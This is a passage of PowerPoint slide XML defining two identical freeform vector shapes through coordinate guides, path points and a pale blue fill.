                  <a:gd name="T48" fmla="*/ 137 w 169"/>
                  <a:gd name="T49" fmla="*/ 10 h 117"/>
                  <a:gd name="T50" fmla="*/ 150 w 169"/>
                  <a:gd name="T51" fmla="*/ 16 h 117"/>
                  <a:gd name="T52" fmla="*/ 150 w 169"/>
                  <a:gd name="T53" fmla="*/ 30 h 117"/>
                  <a:gd name="T54" fmla="*/ 167 w 169"/>
                  <a:gd name="T55" fmla="*/ 38 h 117"/>
                  <a:gd name="T56" fmla="*/ 169 w 169"/>
                  <a:gd name="T57" fmla="*/ 49 h 117"/>
                  <a:gd name="T58" fmla="*/ 168 w 169"/>
                  <a:gd name="T59" fmla="*/ 60 h 117"/>
                  <a:gd name="T60" fmla="*/ 164 w 169"/>
                  <a:gd name="T61" fmla="*/ 67 h 117"/>
                  <a:gd name="T62" fmla="*/ 156 w 169"/>
                  <a:gd name="T63" fmla="*/ 69 h 117"/>
                  <a:gd name="T64" fmla="*/ 152 w 169"/>
                  <a:gd name="T65" fmla="*/ 83 h 117"/>
                  <a:gd name="T66" fmla="*/ 145 w 169"/>
                  <a:gd name="T67" fmla="*/ 86 h 117"/>
                  <a:gd name="T68" fmla="*/ 136 w 169"/>
                  <a:gd name="T69" fmla="*/ 91 h 117"/>
                  <a:gd name="T70" fmla="*/ 122 w 169"/>
                  <a:gd name="T71" fmla="*/ 101 h 117"/>
                  <a:gd name="T72" fmla="*/ 110 w 169"/>
                  <a:gd name="T73" fmla="*/ 103 h 117"/>
                  <a:gd name="T74" fmla="*/ 99 w 169"/>
                  <a:gd name="T75" fmla="*/ 114 h 117"/>
                  <a:gd name="T76" fmla="*/ 88 w 169"/>
                  <a:gd name="T77" fmla="*/ 117 h 117"/>
                  <a:gd name="T78" fmla="*/ 74 w 169"/>
                  <a:gd name="T79" fmla="*/ 114 h 117"/>
                  <a:gd name="T80" fmla="*/ 60 w 169"/>
                  <a:gd name="T81" fmla="*/ 104 h 117"/>
                  <a:gd name="T82" fmla="*/ 49 w 169"/>
                  <a:gd name="T83" fmla="*/ 104 h 117"/>
                  <a:gd name="T84" fmla="*/ 29 w 169"/>
                  <a:gd name="T85" fmla="*/ 101 h 117"/>
                  <a:gd name="T86" fmla="*/ 30 w 169"/>
                  <a:gd name="T87" fmla="*/ 95 h 117"/>
                  <a:gd name="T88" fmla="*/ 43 w 169"/>
                  <a:gd name="T89" fmla="*/ 80 h 117"/>
                  <a:gd name="T90" fmla="*/ 33 w 169"/>
                  <a:gd name="T91" fmla="*/ 77 h 117"/>
                  <a:gd name="T92" fmla="*/ 29 w 169"/>
                  <a:gd name="T93" fmla="*/ 69 h 117"/>
                  <a:gd name="T94" fmla="*/ 15 w 169"/>
                  <a:gd name="T95" fmla="*/ 72 h 117"/>
                  <a:gd name="T96" fmla="*/ 8 w 169"/>
                  <a:gd name="T97" fmla="*/ 69 h 117"/>
                  <a:gd name="T98" fmla="*/ 12 w 169"/>
                  <a:gd name="T99" fmla="*/ 64 h 117"/>
                  <a:gd name="T100" fmla="*/ 23 w 169"/>
                  <a:gd name="T101" fmla="*/ 62 h 117"/>
                  <a:gd name="T102" fmla="*/ 35 w 169"/>
                  <a:gd name="T103" fmla="*/ 58 h 117"/>
                  <a:gd name="T104" fmla="*/ 39 w 169"/>
                  <a:gd name="T105" fmla="*/ 50 h 117"/>
                  <a:gd name="T106" fmla="*/ 36 w 169"/>
                  <a:gd name="T107" fmla="*/ 42 h 117"/>
                  <a:gd name="T108" fmla="*/ 29 w 169"/>
                  <a:gd name="T109" fmla="*/ 39 h 117"/>
                  <a:gd name="T110" fmla="*/ 16 w 169"/>
                  <a:gd name="T111" fmla="*/ 40 h 117"/>
                  <a:gd name="T112" fmla="*/ 8 w 169"/>
                  <a:gd name="T113" fmla="*/ 44 h 117"/>
                  <a:gd name="T114" fmla="*/ 0 w 169"/>
                  <a:gd name="T115" fmla="*/ 36 h 117"/>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69"/>
                  <a:gd name="T175" fmla="*/ 0 h 117"/>
                  <a:gd name="T176" fmla="*/ 169 w 169"/>
                  <a:gd name="T177" fmla="*/ 117 h 117"/>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69" h="117">
                    <a:moveTo>
                      <a:pt x="0" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36187" name="Freeform 320"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2355" y="1520"/>
                <a:ext cx="169" cy="117"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 169"/>
                  <a:gd name="T1" fmla="*/ 33 h 117"/>
                  <a:gd name="T2" fmla="*/ 10 w 169"/>
                  <a:gd name="T3" fmla="*/ 31 h 117"/>
                  <a:gd name="T4" fmla="*/ 12 w 169"/>
                  <a:gd name="T5" fmla="*/ 25 h 117"/>
                  <a:gd name="T6" fmla="*/ 12 w 169"/>
                  <a:gd name="T7" fmla="*/ 13 h 117"/>
                  <a:gd name="T8" fmla="*/ 20 w 169"/>
                  <a:gd name="T9" fmla="*/ 20 h 117"/>
                  <a:gd name="T10" fmla="*/ 27 w 169"/>
                  <a:gd name="T11" fmla="*/ 18 h 117"/>
                  <a:gd name="T12" fmla="*/ 22 w 169"/>
                  <a:gd name="T13" fmla="*/ 7 h 117"/>
                  <a:gd name="T14" fmla="*/ 32 w 169"/>
                  <a:gd name="T15" fmla="*/ 7 h 117"/>
                  <a:gd name="T16" fmla="*/ 44 w 169"/>
                  <a:gd name="T17" fmla="*/ 13 h 117"/>
                  <a:gd name="T18" fmla="*/ 46 w 169"/>
                  <a:gd name="T19" fmla="*/ 30 h 117"/>
                  <a:gd name="T20" fmla="*/ 49 w 169"/>
                  <a:gd name="T21" fmla="*/ 49 h 117"/>
                  <a:gd name="T22" fmla="*/ 56 w 169"/>
                  <a:gd name="T23" fmla="*/ 40 h 117"/>
                  <a:gd name="T24" fmla="*/ 64 w 169"/>
                  <a:gd name="T25" fmla="*/ 35 h 117"/>
                  <a:gd name="T26" fmla="*/ 63 w 169"/>
                  <a:gd name="T27" fmla="*/ 18 h 117"/>
                  <a:gd name="T28" fmla="*/ 71 w 169"/>
                  <a:gd name="T29" fmla="*/ 22 h 117"/>
                  <a:gd name="T30" fmla="*/ 77 w 169"/>
                  <a:gd name="T31" fmla="*/ 31 h 117"/>
                  <a:gd name="T32" fmla="*/ 80 w 169"/>
                  <a:gd name="T33" fmla="*/ 29 h 117"/>
                  <a:gd name="T34" fmla="*/ 80 w 169"/>
                  <a:gd name="T35" fmla="*/ 18 h 117"/>
                  <a:gd name="T36" fmla="*/ 88 w 169"/>
                  <a:gd name="T37" fmla="*/ 15 h 117"/>
                  <a:gd name="T38" fmla="*/ 96 w 169"/>
                  <a:gd name="T39" fmla="*/ 26 h 117"/>
                  <a:gd name="T40" fmla="*/ 101 w 169"/>
                  <a:gd name="T41" fmla="*/ 24 h 117"/>
                  <a:gd name="T42" fmla="*/ 105 w 169"/>
                  <a:gd name="T43" fmla="*/ 18 h 117"/>
                  <a:gd name="T44" fmla="*/ 121 w 169"/>
                  <a:gd name="T45" fmla="*/ 17 h 117"/>
                  <a:gd name="T46" fmla="*/ 124 w 169"/>
                  <a:gd name="T47" fmla="*/ 0 h 117"/>
                  <a:gd name="T48" fmla="*/ 137 w 169"/>
                  <a:gd name="T49" fmla="*/ 10 h 117"/>
                  <a:gd name="T50" fmla="*/ 150 w 169"/>
                  <a:gd name="T51" fmla="*/ 16 h 117"/>
                  <a:gd name="T52" fmla="*/ 150 w 169"/>
                  <a:gd name="T53" fmla="*/ 30 h 117"/>
                  <a:gd name="T54" fmla="*/ 167 w 169"/>
                  <a:gd name="T55" fmla="*/ 38 h 117"/>
                  <a:gd name="T56" fmla="*/ 169 w 169"/>
                  <a:gd name="T57" fmla="*/ 49 h 117"/>
                  <a:gd name="T58" fmla="*/ 168 w 169"/>
                  <a:gd name="T59" fmla="*/ 60 h 117"/>
                  <a:gd name="T60" fmla="*/ 164 w 169"/>
                  <a:gd name="T61" fmla="*/ 67 h 117"/>
                  <a:gd name="T62" fmla="*/ 156 w 169"/>
                  <a:gd name="T63" fmla="*/ 69 h 117"/>
                  <a:gd name="T64" fmla="*/ 152 w 169"/>
                  <a:gd name="T65" fmla="*/ 83 h 117"/>
                  <a:gd name="T66" fmla="*/ 145 w 169"/>
                  <a:gd name="T67" fmla="*/ 86 h 117"/>
                  <a:gd name="T68" fmla="*/ 136 w 169"/>
                  <a:gd name="T69" fmla="*/ 91 h 117"/>
                  <a:gd name="T70" fmla="*/ 122 w 169"/>
                  <a:gd name="T71" fmla="*/ 101 h 117"/>
                  <a:gd name="T72" fmla="*/ 110 w 169"/>
                  <a:gd name="T73" fmla="*/ 103 h 117"/>
                  <a:gd name="T74" fmla="*/ 99 w 169"/>
                  <a:gd name="T75" fmla="*/ 114 h 117"/>
                  <a:gd name="T76" fmla="*/ 88 w 169"/>
                  <a:gd name="T77" fmla="*/ 117 h 117"/>
                  <a:gd name="T78" fmla="*/ 74 w 169"/>
                  <a:gd name="T79" fmla="*/ 114 h 117"/>
                  <a:gd name="T80" fmla="*/ 60 w 169"/>
                  <a:gd name="T81" fmla="*/ 104 h 117"/>
                  <a:gd name="T82" fmla="*/ 49 w 169"/>
                  <a:gd name="T83" fmla="*/ 104 h 117"/>
                  <a:gd name="T84" fmla="*/ 29 w 169"/>
                  <a:gd name="T85" fmla="*/ 101 h 117"/>
                  <a:gd name="T86" fmla="*/ 30 w 169"/>
                  <a:gd name="T87" fmla="*/ 95 h 117"/>
                  <a:gd name="T88" fmla="*/ 43 w 169"/>
                  <a:gd name="T89" fmla="*/ 80 h 117"/>
                  <a:gd name="T90" fmla="*/ 33 w 169"/>
                  <a:gd name="T91" fmla="*/ 77 h 117"/>
                  <a:gd name="T92" fmla="*/ 29 w 169"/>
                  <a:gd name="T93" fmla="*/ 69 h 117"/>
                  <a:gd name="T94" fmla="*/ 15 w 169"/>
                  <a:gd name="T95" fmla="*/ 72 h 117"/>
                  <a:gd name="T96" fmla="*/ 8 w 169"/>
                  <a:gd name="T97" fmla="*/ 69 h 117"/>
                  <a:gd name="T98" fmla="*/ 12 w 169"/>
                  <a:gd name="T99" fmla="*/ 64 h 117"/>
                  <a:gd name="T100" fmla="*/ 23 w 169"/>
                  <a:gd name="T101" fmla="*/ 62 h 117"/>
                  <a:gd name="T102" fmla="*/ 35 w 169"/>
                  <a:gd name="T103" fmla="*/ 58 h 117"/>
                  <a:gd name="T104" fmla="*/ 39 w 169"/>
                  <a:gd name="T105" fmla="*/ 50 h 117"/>
                  <a:gd name="T106" fmla="*/ 36 w 169"/>
                  <a:gd name="T107" fmla="*/ 42 h 117"/>
                  <a:gd name="T108" fmla="*/ 29 w 169"/>
                  <a:gd name="T109" fmla="*/ 39 h 117"/>
                  <a:gd name="T110" fmla="*/ 16 w 169"/>
                  <a:gd name="T111" fmla="*/ 40 h 117"/>
                  <a:gd name="T112" fmla="*/ 8 w 169"/>
                  <a:gd name="T113" fmla="*/ 44 h 117"/>
                  <a:gd name="T114" fmla="*/ 0 w 169"/>
                  <a:gd name="T115" fmla="*/ 36 h 117"/>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69"/>
                  <a:gd name="T175" fmla="*/ 0 h 117"/>
                  <a:gd name="T176" fmla="*/ 169 w 169"/>
                  <a:gd name="T177" fmla="*/ 117 h 117"/>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69" h="117">
                    <a:moveTo>
                      <a:pt x="0" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
